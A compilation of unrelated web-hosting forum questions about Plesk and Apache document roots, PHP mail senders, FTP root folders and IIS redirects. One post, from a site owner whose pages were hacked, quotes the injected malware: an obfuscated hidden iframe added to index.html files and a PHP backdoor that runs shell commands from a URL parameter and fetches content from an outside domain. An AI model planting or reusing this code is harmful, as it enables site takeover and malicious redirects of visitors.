Document Root Default In Plesk

Dec 18, 2008

Document root default in Plesk

I bought a new plesk and created new domains. For some odd reason, all the domains are looking at the default document root.

/var/www/vhosts/default/htdocs/
Rather than going to the domains document root
/var/www/vhosts/domain.com/conf

I checked the /var/www/vhosts/domain.com/conf/httpd.include, the document root and all are fine.

I also tried creating vhost.conf and assigning the document root there.
/usr/local/psa/admin/sbin/websrvmng --reconfigure-vhost --vhost-name=domain.com -v

It is also not working...

Plesk 12.x / Linux :: Default Document Root

I think it is possible, but just to be sure...

Default document root is:

var/www/vhosts/www.mysite.com/httpdocs/

Can I change it to:

var/www/vhosts/www.mysite.com/web/

A simple "yes" or "no" will do...

Apache :: Cannot Change Document Root

Oct 26, 2013

I just made a fresh install of the following :

Apache 2.4 (x64)
PHP 5.5.5 Thread Safe (x64)
OS: Windows 8.1 (x64)

And I think everything is working. When openingen 127.0.0.1 I see the apache message that the server is running and when executing phpinfo() it displays the PHP info.

My problem is that I'm trying to change the document root.

I have change the following in the httpd.conf:

DocumentRoot "C:/Apache24/htdocs"
<Directory "C:/Apache24/htdocs">

The lines abowe have been change to:

DocumentRoot "D:/www"
<Directory "D:/www">

After this I did a reboot of the apache server using the CMD httpd -k restart. I even tried restarting using the apachemonitor and rebooted the whole server. But apache still loads the files from c:/Apache24/htdocs

I can't find any more entries with htdocs to change. What am I missing?

Modifying Apache's Default Index

Jul 7, 2007

I was using Apache's <Directory> directive to modify the way the default indexes look.

I recently moved from openSUSE to Windows Server 2003 and copied over the Directory code but it no longer works.

Code:
<Directory />

AllowOverride All
IndexOptions SuppressHTMLPreamble SuppressDescription FancyIndexing VersionSort FoldersFirst IgnoreCase IconsAreLinks NameWidth=60
HeaderName /!_images/html/header.shtml
ReadmeName /!_images/html/footer.shtml

IndexIgnore query.txt !_images !_Jason !_media2 lost+found Modules _images login torrentflux phpinfo.php Thumbs.db tmp.txt phpmyadmin sandbox test.txt test.php _index.php robots.txt System Volume Information RECYCLER

It doesn't load the headerfile or the readme file (they exist) and it uses the Default Icon for all files

Document Root Change (e.g. /home/newfilehere/

Aug 2, 2008

On my VPS I currently have:

/home/admin/public_html/ as my website root.

However, I plan on running multiple website (not linked whatsoever) on the server. I have LXAdmin and HyperVM. Is it possible to get additional files, such as:

/home/site2/public_html/

then etc..

/home/site3/public_html/

Is this possible? Because, would each need its own IP for the DNS?

Plesk 12.x / Linux :: How To Change Document Root With Web Applications Installed

Feb 8, 2015

i am relatively new to Plesk, i ordered a vserver with Plesk a couple of months ago and spend a lot of time setting everything up and developing several new websites. I am used to developping new websites on a hidden adress (sth like domain.com/dev/ instead of the top level) and then switch the document root to point to the hidden directory when all is done. This practice has served me and my clients well for the last 10 years.

Using the Plesk features like built-in applications seemed like a good idea at the time but wanting to switch the new websites live i have now found out that Plesk won't let me do this since..It is impossible to change document root because there are web applications installed on this website.

I had read somewhere on the interweb that the v12 would let me do this so i just spent the better part of today updating to v12 .. but alas no luck, the limitation is still there. Is there a way to remove this limitation ?

Static Index.html Pages Hacked, Also Index Files

Sep 8, 2007

My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.

I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).

Going back on track, all files named "%index%" were hacked.

-I found a index.txt file with links to obscure sites.

The code was written at bottom of the all index.html files: iframe code

Code:
><!-- ~ --><iframe src="&#104&#116&#116&#112&#58&#47&#47&#103&#111&#111&#103&#108&#101&#116&#114&#97&#102&#102&#46&#99&#111&#109&#47&#105&#110&#46&#99&#103&#105&#63&#100&#101&#102&#97&#117&#108&#116" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code

PHP Code:

<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)

");$wr = 0;while(!feof($socket)){  $temp = fgets($socket);    if(eregi("<",$temp)) {      $wr = 1;        }                      if($wr) {              $page .= $temp;                }                }                fclose($socket);                                return $page;                }                                ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...

Change Default Sender Address Using Php Mail() / Sendmail

Oct 31, 2009

I'm wondering if anyone else has experience with this, or if it's something easy that I'm overlooking.

I am on a VPS service (CentOS Linux) and I want my php mail function emails to send from a specified address. I've already manipulated the headers, so the emails do appear to come from the specified addres, but on mobile devices it comes up as nobody@server1.mydomain.com format. I would like this to read something like no-reply@mydomain.com

know which configuration files can change this default address?

Plesk 12.x / Linux :: Proftpd Default Folder Change?

Feb 11, 2015

I am noticing that several of my users are wiping out their user root folders ( logs, error docs, etc...) when they fail to use '/httpdocs/' as the root directory when publishing with FTP.

I fixed this by editing the proftpd.conf to use ~/httpdocs/ as the DefaultRoot folder ( instead of just ~/ ).Would it be safer(better) to go through all the ftp users and make the home directory '/httpdocs/' instead of '/' in the admin UI? If yes, what is the best way to do a mass update of this setting for multiple users ( multiple domains ) ?

301 Redirect From Index.htm Index.asp Using Limited IIS Server

Mar 6, 2007

I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.

The problem is that their old index.htm page has a pagerank of 4 which we want to keep.

And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.

The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.

My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?

JavaScript, I have heard is completely out the question
